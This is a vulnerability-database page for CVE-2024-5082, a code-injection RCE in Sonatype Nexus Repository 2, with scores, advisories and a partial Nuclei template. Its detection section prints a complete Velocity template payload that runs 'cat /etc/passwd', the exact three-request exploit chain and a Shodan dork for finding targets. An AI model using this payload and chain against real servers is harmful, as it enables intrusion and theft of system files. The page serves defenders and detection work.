CVE-2024-5082
published 2024-11-14CVE-2024-5082: A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2. This issue affects Nexus Repository 2 OSS/Pro versions up to and…
PriorityP277high7.1CVSS 4.0
AVNACLATNPRLUINVCHVILVANSCNSILSANEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
1.86%
76.6th percentile
A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2.
This issue affects Nexus Repository 2 OSS/Pro versions up to and including 2.15.1.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sonatype | nexus_repository | 2.0.0 – 2.15.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
urlPUT /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml↗
urlPUT /nexus/service/local/repositories/releases/content//.nexus/attributes/com/sbt/ignite/ignite-bom/maven-metadata.xml↗
urlGET /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml↗
command#set($engine="") #set($run=$engine.getClass().forName("java.lang.Runtime")) #set($runtime=$run.getRuntime()) #set($proc=$runtime.exec("cat /etc/passwd")) #set($null=$proc.waitFor()) #set($istr=$proc.getInputStream()) #set($chr=$engine.getClass().forName("java.lang.Character")) #set($output="") #set($string=$engine.getClass().forName("java.lang.String")) #foreach($i in [1..$istr.available()]) #set($output=$output.concat($string.valueOf($chr.toChars($istr.read())))) #end $output↗
- →Exploit is a 3-step chain: (1) HTTP PUT of a Velocity-templated payload to a Maven metadata path, (2) HTTP PUT to the hidden /.nexus/attributes/ path setting contentGenerator to 'velocity', (3) HTTP GET to trigger server-side template rendering and retrieve RCE output. ↗
- →Step 1 PUT must return HTTP 201 for the exploit chain to proceed; monitor for unexpected 201 responses to PUT requests on Nexus Maven metadata paths. ↗
- →Step 2 sets the contentGenerator attribute to 'velocity' via a PUT to the /.nexus/attributes/ path — alert on PUT requests containing this path segment combined with the 'velocity' content generator value. ↗
- →The Velocity SSTI payload uses java.lang.Runtime.exec() via reflection; detect Velocity template syntax (#set, #foreach, getClass().forName) in HTTP request bodies to Nexus endpoints. ↗
- →Shodan dork for exposed Nexus Repository 2 instances: html:"Nexus Repository" ↗
- →Successful exploitation returns /etc/passwd content (matching root:.*:0:0:) in the response body with Content-Type text/plain from the GET request. ↗
- ·The exploit requires valid credentials (Basic Auth) to authenticate to the Nexus Repository 2 instance; unauthenticated exploitation is not demonstrated in the template. ↗
- ·Affected versions are Nexus Repository 2 OSS/Pro up to and including 2.15.1 only; Nexus Repository 3 is a separate product and not affected by this CVE. ↗
CVSS provenance
nvdv4.07.1HIGHCVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck7.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6q5h-c4ff-f2vc: A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2
ghsa_unreviewed·2024-11-14
CVE-2024-5082 [HIGH] CWE-94 GHSA-6q5h-c4ff-f2vc: A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2
A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2.
This issue affects Nexus Repository 2 OSS/Pro versions up to and including 2.15.1.
VulnCheck
sonatype nexus_repository_manager Improper Control of Generation of Code ('Code Injection')
vulncheck·2024·CVSS 7.1
CVE-2024-5082 [HIGH] sonatype nexus_repository_manager Improper Control of Generation of Code ('Code Injection')
sonatype nexus_repository_manager Improper Control of Generation of Code ('Code Injection')
A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2.
This issue affects Nexus Repository 2 OSS/Pro versions up to and including 2.15.1.
Affected: sonatype nexus_repository_manager
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2024-5082
No detection rules found.
Nuclei
Nexus Repository 2 - Remote Code Execution
nuclei·CVSS 7.1
CVE-2024-5082 [HIGH] Nexus Repository 2 - Remote Code Execution
Nexus Repository 2 - Remote Code Execution
A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2.This issue affects Nexus Repository 2 OSS/Pro versions up to and including 2.15.1.
Template:
id: CVE-2024-5082
info:
name: Nexus Repository 2 - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2.This issue affects Nexus Repository 2 OSS/Pro versions up to and including 2.15.1.
impact: |
Attackers can exploit vulnerabilities to compromise the system.
remediation: |
Update to the latest patched version addressing CVE-2024-5082.
reference:
- https://github.blog/security/vulnerability-research/attacks-on-maven-proxy-repositories/
-
2024-11-14
Published
Exploited in the wild